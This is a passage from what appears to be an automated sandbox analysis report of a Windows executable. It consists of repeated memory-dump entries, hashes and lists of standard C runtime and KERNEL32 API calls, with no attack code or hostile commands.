              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
              • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
              • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
              • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
              • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
              • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
              • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
              • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
              • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
              • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
              APIs
              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,025A18F8), ref: 004170C5
              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
              • _malloc.LIBCMT ref: 0041718A
              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
              • _malloc.LIBCMT ref: 0041724C
              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
              • __freea.LIBCMT ref: 004172A4
              • __freea.LIBCMT ref: 004172AD
              • ___ansicp.LIBCMT ref: 004172DE
              • ___convertcp.LIBCMT ref: 00417309
              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
              • _malloc.LIBCMT ref: 00417362
              • _memset.LIBCMT ref: 00417384
              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
              • ___convertcp.LIBCMT ref: 004173BA
              • __freea.LIBCMT ref: 004173CF
              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
              • String ID:
              • API String ID: 3809854901-0
              • Opcode ID: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
              • Opcode Fuzzy Hash: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
              APIs
              • _malloc.LIBCMT ref: 004057DE
                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
              • _malloc.LIBCMT ref: 00405842
              • _malloc.LIBCMT ref: 00405906
              • _malloc.LIBCMT ref: 00405930
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: _malloc$AllocateHeap
              • String ID: 1.2.3
              • API String ID: 680241177-2310465506
              • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
              • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
              • String ID:
              • API String ID: 3886058894-0
              • Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
              • Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
              APIs
              • __lock_file.LIBCMT ref: 0040C6C8
              • __fileno.LIBCMT ref: 0040C6D6
              • __fileno.LIBCMT ref: 0040C6E2
              • __fileno.LIBCMT ref: 0040C6EE
              • __fileno.LIBCMT ref: 0040C6FE
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
              • String ID: 'B
              • API String ID: 2805327698-2787509829
              • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
              • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
              • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
              • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
              APIs
              • __getptd.LIBCMT ref: 00414744
                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
              • __getptd.LIBCMT ref: 0041475B
              • __amsg_exit.LIBCMT ref: 00414769
              • __lock.LIBCMT ref: 00414779
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
              • String ID: @.B
              • API String ID: 3521780317-470711618
              • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
              • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
              • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
              • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
              APIs
              • __getptd.LIBCMT ref: 00413FD8
                • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
              • __amsg_exit.LIBCMT ref: 00413FF8
              • __lock.LIBCMT ref: 00414008
              • InterlockedDecrement.KERNEL32(?), ref: 00414025
              • InterlockedIncrement.KERNEL32(025A1690), ref: 00414050
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
              • String ID:
              • API String ID: 4271482742-0
              • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
              • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
              • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
              • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: __calloc_crt
              • String ID: P$B$`$B
              • API String ID: 3494438863-235554963
              • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
              • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
              • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
              • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
              APIs
              • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
              • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: AddressHandleModuleProc
              • String ID: IsProcessorFeaturePresent$KERNEL32
              • API String ID: 1646373207-3105848591
              • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
              • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
              • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
              • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
              APIs
              • ___addlocaleref.LIBCMT ref: 0041470C
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(00000001), ref: 004145E4
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145F1
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 004145FE
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041460B
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414618
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414634
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 00414644
                • Part of subcall function 004145D2: InterlockedIncrement.KERNEL32(?), ref: 0041465A
              • ___removelocaleref.LIBCMT ref: 00414717
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 0041467B
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414688
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 00414695
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146A2
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146AF
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146CB
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(00000000), ref: 004146DB
                • Part of subcall function 00414661: InterlockedDecrement.KERNEL32(?), ref: 004146F1
              • ___freetlocinfo.LIBCMT ref: 0041472B
                • Part of subcall function 00414489: ___free_lconv_mon.LIBCMT ref: 004144CF
                • Part of subcall function 00414489: ___free_lconv_num.LIBCMT ref: 004144F0
                • Part of subcall function 00414489: ___free_lc_time.LIBCMT ref: 00414575
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: Interlocked$DecrementIncrement$___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
              • String ID: @.B
              • API String ID: 467427115-470711618
              • Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
              • Instruction ID: 8e9b8205a585dc9325c25650a27042e0212317e7447dcce9b0fe23aa5a8dd77f
              • Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
              • Instruction Fuzzy Hash: BDE0863250192255CE35261D76806EF93A98FD3725B3A017FF864AF7D8EB2C4CC0809D
              APIs
              • __fileno.LIBCMT ref: 0040C77C
              • __locking.LIBCMT ref: 0040C791
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: __decode_pointer__fileno__getptd_noexit__locking
              • String ID:
              • API String ID: 2395185920-0
              • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
              • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
              • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
              • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: _fseek_malloc_memset
              • String ID:
              • API String ID: 208892515-0
              • Opcode ID: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
              • Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
              • Opcode Fuzzy Hash: e2021bf9677ac04d29097cd60d098293ca774abcf3d3e4afca42f73e68fb5c2d
              • Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89
              APIs
              • __flush.LIBCMT ref: 0040BB6E
              • __fileno.LIBCMT ref: 0040BB8E
              • __locking.LIBCMT ref: 0040BB95
              • __flsbuf.LIBCMT ref: 0040BBC0
                • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
              • String ID:
              • API String ID: 3240763771-0
              • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
              • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
              • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
              • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
              • __isleadbyte_l.LIBCMT ref: 00415307
              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
              • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
              • Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
